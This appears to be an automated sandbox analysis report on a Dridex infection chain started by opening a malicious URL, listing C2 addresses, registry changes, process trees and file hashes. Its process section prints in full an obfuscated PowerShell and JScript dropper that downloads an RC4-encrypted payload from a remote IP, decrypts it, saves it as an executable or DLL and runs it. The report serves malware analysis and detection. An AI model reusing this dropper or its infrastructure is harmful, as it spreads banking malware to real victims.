Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
24-01-2021 23:45
Static task
static1
URLScan task
urlscan1
Sample
http://zeroexit.xyz/9HJDckdsvfsdefvs34
General
Malware Config
Extracted
dridex
10111
162.241.44.26:9443
185.184.25.234:4664
138.201.138.91:3389
Signatures
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\k5yuz.exe cryptone C:\Users\Admin\AppData\Local\Temp\k5yuz.exe cryptone \Users\Admin\AppData\Local\Temp\k5yuz.exe cryptone C:\Users\Admin\AppData\Local\Temp\k5yuz.exe cryptone -
Processes:
resource yara_rule behavioral1/memory/1656-67-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr behavioral1/memory/1656-71-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 2 IoCs
Processes:
wscript.exewscript.exeflow pid process 13 1640 wscript.exe 14 1108 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
k5yuz.exepid process 1656 k5yuz.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.exepid process 676 cmd.exe 676 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
k5yuz.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA k5yuz.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{61562AF1-5EA6-11EB-AA5C-E6A19248D3FE} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "318300403" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000956dba6a573b2affc1d36c847628d5253982e24487ba505d47705cb8a2680ec9000000000e8000000002000020000000e2c6188ae7296661ad361be899f0a27f4466c3809f7bddbb47843b87f3e4dc209000000074b5e439b6ced4b0eec257d44c5d4622455a1646f3543616ad64165377f81e66a5528e26eaee9f064129c776bea0e27c796ac80039be076cd43b4153e59430eb04159b029a03ede84ba0d5735785bcf6dc97beb978c825074553bcb5e6da2719e092e7fb2c6cea41b17018d925cac52ef8e66f69548633212207bccc1329925f77c951313761f3218912691163164fa540000000e2b58794781a0d0402b6d7b60a1071a3725348f5479593fcecabda9cbdc3f3a6f68731fe28069993947ac7d107da977610789d93e6345f4974db89e84c0063ae iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a056b03eb3f2d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000987e037d9d29f9a8ed3c70ff71dd3a482278536b641909506c3977cd8be8de42000000000e800000000200002000000038294b6dbe5d9108dfebf5a87c436ccb61acbed07b6fe513848952b851d1c0f02000000075819e95bc38a6128cbe74179a8b0b33efea36afaa94187f192c08784b1302da40000000c04c4b1e3103d670b4c3d1fc5a116de2968e5b981f11d3429c516207893234137e8c56a0ddd37c81dd63e7b86a4d1a56cd48e804ec959a77a3afade3b144caca iexplore.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
PowerShell.exePowerShell.exepid process 1868 PowerShell.exe 1188 PowerShell.exe 1188 PowerShell.exe 1868 PowerShell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
PowerShell.exePowerShell.exedescription pid process Token: SeDebugPrivilege 1868 PowerShell.exe Token: SeDebugPrivilege 1188 PowerShell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 892 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEpid process 892 iexplore.exe 892 iexplore.exe 1328 IEXPLORE.EXE 1328 IEXPLORE.EXE 1492 IEXPLORE.EXE 1492 IEXPLORE.EXE 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEPowerShell.execmd.exePowerShell.execmd.exewscript.execmd.exedescription pid process target process PID 892 wrote to memory of 1328 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1328 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1328 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1328 892 iexplore.exe IEXPLORE.EXE PID 1328 wrote to memory of 1188 1328 IEXPLORE.EXE PowerShell.exe PID 1328 wrote to memory of 1188 1328 IEXPLORE.EXE PowerShell.exe PID 1328 wrote to memory of 1188 1328 IEXPLORE.EXE PowerShell.exe PID 1328 wrote to memory of 1188 1328 IEXPLORE.EXE PowerShell.exe PID 892 wrote to memory of 1492 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1492 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1492 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1492 892 iexplore.exe IEXPLORE.EXE PID 1492 wrote to memory of 1868 1492 IEXPLORE.EXE PowerShell.exe PID 1492 wrote to memory of 1868 1492 IEXPLORE.EXE PowerShell.exe PID 1492 wrote to memory of 1868 1492 IEXPLORE.EXE PowerShell.exe PID 1492 wrote to memory of 1868 1492 IEXPLORE.EXE PowerShell.exe PID 892 wrote to memory of 1312 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1312 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1312 892 iexplore.exe IEXPLORE.EXE PID 892 wrote to memory of 1312 892 iexplore.exe IEXPLORE.EXE PID 1868 wrote to memory of 1992 1868 PowerShell.exe cmd.exe PID 1868 wrote to memory of 1992 1868 PowerShell.exe cmd.exe PID 1868 wrote to memory of 1992 1868 PowerShell.exe cmd.exe PID 1868 wrote to memory of 1992 1868 PowerShell.exe cmd.exe PID 1992 wrote to memory of 1108 1992 cmd.exe wscript.exe PID 1992 wrote to memory of 1108 1992 cmd.exe wscript.exe PID 1992 wrote to memory of 1108 1992 cmd.exe wscript.exe PID 1992 wrote to memory of 1108 1992 cmd.exe wscript.exe PID 1188 wrote to memory of 1696 1188 PowerShell.exe cmd.exe PID 1188 wrote to memory of 1696 1188 PowerShell.exe cmd.exe PID 1188 wrote to memory of 1696 1188 PowerShell.exe cmd.exe PID 1188 wrote to memory of 1696 1188 PowerShell.exe cmd.exe PID 1696 wrote to memory of 1640 1696 cmd.exe wscript.exe PID 1696 wrote to memory of 1640 1696 cmd.exe wscript.exe PID 1696 wrote to memory of 1640 1696 cmd.exe wscript.exe PID 1696 wrote to memory of 1640 1696 cmd.exe wscript.exe PID 1108 wrote to memory of 676 1108 wscript.exe cmd.exe PID 1108 wrote to memory of 676 1108 wscript.exe cmd.exe PID 1108 wrote to memory of 676 1108 wscript.exe cmd.exe PID 1108 wrote to memory of 676 1108 wscript.exe cmd.exe PID 676 wrote to memory of 1656 676 cmd.exe k5yuz.exe PID 676 wrote to memory of 1656 676 cmd.exe k5yuz.exe PID 676 wrote to memory of 1656 676 cmd.exe k5yuz.exe PID 676 wrote to memory of 1656 676 cmd.exe k5yuz.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://zeroexit.xyz/9HJDckdsvfsdefvs341⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=^&FieJTJh^&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5^&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz^&zsqvYbgLMzk3MQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=^&FieJTJh^&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5^&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz^&zsqvYbgLMzk3MQ== 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=&FieJTJh&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz&zsqvYbgLMzk3MQ== 15⤵
- Blocklisted process makes network request
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:340994 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2^&LsY^&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y^&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w^&OCANDEwOQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2^&LsY^&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y^&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w^&OCANDEwOQ== 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2&LsY&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w&OCANDEwOQ== 15⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c k5yuz.exe6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\k5yuz.exek5yuz.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:209934 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
c14ce2d192d610b09898a1cf3ae24d02
SHA104d901c4cc0f6e84b3076d915edaae6ff63d41b6
SHA25670e60a8944bd8ae0d2efdb45ecd25b45c661d5ecfccd319fd761380993ddf558
SHA512ab949b92ee98d73628c2c96345aeac4851796f5ce5318e50178ac575f75107ce47b1898199a5044e89935300ad584c02a757c53d43cfd53f63a571bba112bc07
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3dMD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404MD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9MD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383cMD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
7a3e9ec84e21dabd54bf131473915585
SHA1df6e0515511af43422c36434cf83693415dc94f9
SHA2563c11f53d5d2dc3799de7b9e8f16e5c562b4af6c9492b39e6548ad5ab09e7315d
SHA5125c1d469e43fe35b4064700b3f67da595461d2270d0183015b6b6c418897c16b1ad49064828a2d3e76f6975d80304c0bdd38c1aefb8a49ab647db66d37fa1d206
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ISB2KAC\N8Z6EVD0.htmMD5
a4956484148dd65fd2567a49d3c27709
SHA163e9e87f3cac3efea17501199de10703e23cb5ee
SHA256219bd1e316baa56f52da9c394f6abdff335f594d49f90e88aa99b8fa91a5be48
